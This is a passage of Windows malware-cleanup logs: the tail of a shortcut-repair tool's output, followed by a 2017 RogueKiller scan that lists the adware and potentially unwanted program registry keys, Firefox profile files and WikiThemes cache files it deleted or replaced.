              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PrintDialog.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware\Zemana AntiMalware.lnk” → [ “.”, index=1 ] (Method: 6)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Windows Defender.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Codec Tweak Tool.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Uninstall\Uninstall K-Lite Codec Pack.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\dfrgui.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Cleanup.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (32-bit).lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (64-bit).lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Information.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Quick Assist.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Steps Recorder.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Fax and Scan.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\XPS Viewer.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Windows PowerShell\Windows PowerShell.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Accessories\Notepad.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Accessibility\Magnify.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Accessibility\Narrator.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Accessibility\On-Screen Keyboard.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\01a - Windows PowerShell.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\02a - Windows PowerShell.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Chrome App Launcher.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Accessories\Notepad.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Accessibility\Magnify.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Accessibility\Narrator.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\01a - Windows PowerShell.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\02a - Windows PowerShell.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Accessories\Notepad.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Accessibility\Magnify.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Accessibility\Narrator.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\01a - Windows PowerShell.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\02a - Windows PowerShell.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Public\Desktop\Mozilla Firefox.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\Public\Desktop\Zemana AntiMalware.lnk” → [ “.”, index=1 ] (Method: 6)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Task Manager.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\DirectVobSub.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\ffdshow VFW interface.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Audio.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Splitter.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Video.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\madVR.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\x264 VFW (x64).lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\x264 VFW (x86).lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\Xvid VFW.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Resource Monitor.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Media Player.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Speech Recognition.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S endTo\Fax Recipient.lnk” → [ “.”, index=1 ] (Method: 6)
              [ OK ] “C:\Users\Default\AppData\Roaming\Microsoft\Window s\SendTo\Fax Recipient.lnk” → [ “.”, index=1 ] (Method: 3)
              [ OK ] “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\SendTo\Fax Recipient.lnk” → [ “.”, index=1 ] (Method: 6)
              .
              ______________________________ Statistics _______________________________
              Cure ran per today: 1 times.

              Total processed: 287
              Code:
                   Cured:     125
                   Deleted:   45
                   Omitted:   11
                   Warnings:  106
              ______________________________ End of Log _______________________________
              ______________________________ Debug Info _______________________________
              • Shortcut is damaged: “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiracastView.lnk” (2219 bytes)
              • Shortcut is damaged: “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\System Tools\computer.lnk” (335 bytes)
              • Shortcut is damaged: “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\System Tools\Control Panel.lnk” (405 bytes)
              • Shortcut is damaged: “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\System Tools\Run.lnk” (409 bytes)
              • Shortcut is damaged: “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\System Tools\computer.lnk” (335 bytes)
              • Shortcut is damaged: “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\System Tools\Control Panel.lnk” (405 bytes)
              • Shortcut is damaged: “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\System Tools\Run.lnk” (409 bytes)
              • Shortcut is damaged: “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\System Tools\computer.lnk” (335 bytes)
              • Shortcut is damaged: “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\System Tools\Control Panel.lnk” (405 bytes)
              • Shortcut is damaged: “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\System Tools\Run.lnk” (409 bytes)
                ___________________________ End of debugging ____________________________CRC32: FCF4EF98

              ROGUEKILLER.TXT
              RogueKiller V12.10.2.0 (x64) [Mar 27 2017] (Free) by Adlice Software
              mail : Support Form | Contact • Adlice Software
              Feedback : https://forum.adlice.com
              Website : Free Virus Cleaner | RogueKiller AntiMalware • Adlice Software
              Blog : http://www.adlice.com

              Operating System : Windows 10 (10.0.14393) 64 bits version
              Started in : Normal mode
              User : ASUS [Administrator]
              Started from : C:\Users\ASUS\Desktop\RogueKillerX64.exe
              Mode : Delete – Date : 04/01/2017 05:12:06 (Duration : 00:22:35)

              ¤¤¤ Processes : 0 ¤¤¤

              ¤¤¤ Registry : 17 ¤¤¤
              [Adw.Elex] (X64) HKEY_LOCAL_MACHINE\Software\InterSect Alliance → Deleted
              [Adw.FakeBro] (X86) HKEY_LOCAL_MACHINE\Software\Explorer → Deleted
              [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\trotuxSoftware → Deleted
              [PUP.Ghokswa] (X64) HKEY_USERS.DEFAULT\Software\Firefox → Deleted
              [PUP.Ghokswa] (X86) HKEY_USERS.DEFAULT\Software\Firefox → Deleted
              [Adw.FakeBro] (X64) HKEY_USERS\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\Explorer → Deleted
              [PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\IM → Deleted
              [Adw.FakeBro] (X86) HKEY_USERS\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\Explorer → Deleted
              [PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\IM → Deleted
              [PUP.Ghokswa] (X64) HKEY_USERS\S-1-5-18\Software\Firefox → Deleted
              [PUP.Ghokswa] (X86) HKEY_USERS\S-1-5-18\Software\Firefox → Deleted
              [PUP.WikiThemes] (X64) HKEY_USERS\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\AppDataLow\Software\WikiThemes → Deleted
              [PUP.WikiThemes] (X86) HKEY_USERS\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\AppDataLow\Software\WikiThemes → Deleted
              [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPmlMHrD_xlOeu95O0THUbBGqXOZYiJqh9rdyQRqZi 95INKcagYek6XEcaeXeCQH6nCtl08-tJY-msx_wiZn0BwWhNvPh6hbwd0j-JBuWgd928ntQba5oZQQYTZWVPMNJfQN7n7XKwDKWAPdYWK5FLu oP_3gQJ_RiDsOyIRTq0&q= {searchTerms} → Replaced ( Internet Explorer 6 Search Companion is no longer supported. )
              [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPmlMHrD_xlOeu95O0THUbBGqXOZYiJqh9rdyQRqZi 95INKcagYek6XEcaeXeCQH6nCtl08-tJY-msx_wiZn0BwWhNvPh6hbwd0j-JBuWgd928ntQba5oZQQYTZWVPMNJfQN7n7XKwDKWAPdYWK5FLu oP_3gQJ_RiDsOyIRTq0&q= {searchTerms} → Replaced ( Internet Explorer 6 Search Companion is no longer supported. )
              [PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 → Replaced (2)
              [PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 → Replaced (2)

              ¤¤¤ Tasks : 0 ¤¤¤

              ¤¤¤ Files : 3 ¤¤¤
              [Adw.Elex][Folder] C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\nawe riweentcofise → Deleted
              [Adw.Elex][File] C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\nawe riweentcofise\Profiles\dvwdtm10.default\prefs.js → Deleted
              [Adw.Elex][File] C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\nawe riweentcofise\Profiles\dvwdtm10.default\profiles.i ni → Deleted
              [Adw.Elex][File] C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\nawe riweentcofise\Profiles\dvwdtm10.default\search.jso n.mozlz4 → Deleted
              [Adw.Elex][Folder] C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\nawe riweentcofise\Profiles\dvwdtm10.default → Deleted
              [Adw.Elex][Folder] C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\nawe riweentcofise\Profiles → Deleted
              [PUP.WikiThemes][Folder] C:\Users\ASUS\AppData\Local\WikiThemes → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\00299 f518a9339d7_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\00311 24bc0078819_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\0048f 9ada40778b4_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\00a93 0da0a9a5151_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\012ae 6cb2638b20d_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\020d8 e049c7995e7_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\02d34 10caa47c3a0_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\03ec5 b0fb2395ffb_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\048b7 295ebaf2e5e_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\04d71 8061bfa7688_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\050ba 2210e843fec_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\05f84 6c724f590df_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\06566 547fd8a9a95_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\06a19 c942615c688_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\06a45 c3132d09d55_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\073c3 ca73e81003a_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\08b90 e30d1c705f1_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\099fa a0568117d80_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\09da2 2ad79883eeb_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\0a23c 13b783d1e7d_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\0b963 5f8f6e93b41_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\0bd2f 9de928198c0_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\0c3c4 773d313c907_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\0c506 04d4b01e1f6_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\0ee04 54a7582c367_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\0f465 f0b7cebeea6_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\0fec7 77a9ff35bce_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\111b4 76a02b8fd85_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\124a4 c2ef264a871_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\12a6c 323766a0a24_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\137a1 1ee8d8f487b_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\13c35 33611649d4b_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\14176 eee471ef510_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\14a38 120dd0ef9e6_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\15741 0a1a1010c91_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\158e5 15ebb7b86ef_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\16db3 707bf094ce4_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\1707f 045c0cb7a8c_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\1770e 812a8cc1d43_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\17744 c9885c154a4_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\17af2 63d84b903a4_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\187fd afe08d88f09_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\18b1a 9564dd93d79_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\1a06f 0c36f3a13b5_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\1b553 e89cecda1ad_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\1be3c fe019981dcb_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\1c92e b73a99e6a52_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\1e725 77e995053bd_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\1e7f3 08c56d3b2fc_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\1ef01 4f03d32665f_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\2048b 7e8251e4df3_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\219bc 754c834200e_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\22548 3af863f8d59_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\22ebd d038abb5698_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\24cda 60a3720d981_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\254e2 360ee40a2f5_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\25994 60ef0691821_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\261c1 2228ae48afb_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\270e1 e7cfa39bf5c_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\28435 ff73e65e261_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\29401 95bd9870d6e_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\294e4 5f62f093091_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\2a0ea ddf375d28b4_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\2b071 37f9498b509_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\2b954 920a720b776_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\2bb99 b802d746f57_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\2c3fe 61adcb95f03_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\2c528 20a4aaf8356_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\2ddff c6dff86ffb1_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\2e5a1 9b1d300865a_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\3093b aaba1de8813_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\31a48 7c1f90a4f7d_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\32108 e7b5fb9c405_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\33172 9004ac50989_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\35973 0228da807f8_0 → Deleted
